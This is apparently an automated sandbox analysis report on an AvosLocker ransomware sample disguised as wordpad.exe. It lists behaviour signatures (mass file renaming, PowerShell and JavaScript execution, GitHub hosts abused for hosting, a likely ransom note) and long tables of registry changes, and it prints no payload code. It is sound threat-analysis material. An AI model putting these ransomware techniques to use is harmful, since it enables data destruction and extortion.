Malware Analysis Report

2024-10-16 03:26

Sample ID 240621-mlsxzswdpb
Target wordpad.exe
SHA256 09f10e7344ca61b53a080e4d54c7cb6ecd4e3308254b350906437e29e7a7d9b2
Tags
avoslocker execution ransomware
Score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score
10/10

SHA256

09f10e7344ca61b53a080e4d54c7cb6ecd4e3308254b350906437e29e7a7d9b2

Threat Level: Known bad

The file wordpad.exe was found to be: Known bad.

Malicious Activity Summary

avoslocker execution ransomware

Avoslocker Ransomware

Renames multiple (69) files with added filename extension

Nirsoft

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Executes dropped EXE

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Process spawned suspicious child process

Drops file in System32 directory

Drops file in Program Files directory

Enumerates physical storage devices

Command and Scripting Interpreter: JavaScript

Unsigned PE

Opens file in notepad (likely ransom note)

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SendNotifyMessage

Modifies data under HKEY_USERS

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-21 10:33

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-21 10:33

Reported

2024-06-21 10:55

Platform

win10v2004-20240611-de

Max time kernel

1009s

Max time network

998s

Command Line

"C:\Users\Admin\AppData\Local\Temp\wordpad.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A

Renames multiple (69) files with added filename extension

ransomware

Command and Scripting Interpreter: PowerShell

execution

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A camo.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Process spawned suspicious child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE is not expected to spawn this process N/A C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog.etl C:\Windows\explorer.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\explorer.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState = 240000003428000000000000000000000000000001000000130000000000000062000000 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect = "0" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{23170F69-40C1-278A-1000-000100020000} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000064263917c9c3da01 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly = "0" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowStatusBar = "1" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{470C0EBD-5D73-4D58-9CED-E91E22E23282} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000fb2e3517c9c3da01 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{474C98EE-CF3D-41F5-80E3-4AAB0AB04301} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 01000000000000000db13817c9c3da01 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "6" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden = "2" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn = "0" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133634399871534502" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{11DBB47C-A525-400B-9E80-A54615A090C0} {7F9185B0-CB92-43C5-80A9-92277A4F7B54} 0xFFFF = 010000000000000062853a17c9c3da01 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip = "1" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess = "0" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay = "1" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ExplorerStartupTraceRecorded = "1" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons = "0" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath = "0" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView = "1" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter = "0" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor = "1" C:\Windows\explorer.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\MRUListEx = 00000000ffffffff C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\SniffedFolderType = "Generic" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 020000000100000000000000ffffffff C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\0 = 6800310000000000d558eb551000414456414e437e310000500009000400efbed558eb55d558eb552e0000009c2e02000000060000000000000000000000000000008f8b2c0161006400760061006e00630065006400720075006e002d00780036003400000018000000 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "4294967295" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\0\NodeSlot = "10" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac04000000c8000000354b179bff40d211a27e00c04fc308710300000080000000354b179bff40d211a27e00c04fc308710200000080000000 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Generic" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\SniffedFolderType = "Generic" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlgLegacy C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\0 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 = 14002e8005398e082303024b98265d99428e115f0000 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\0\MRUListEx = ffffffff C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 000000000200000001000000ffffffff C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
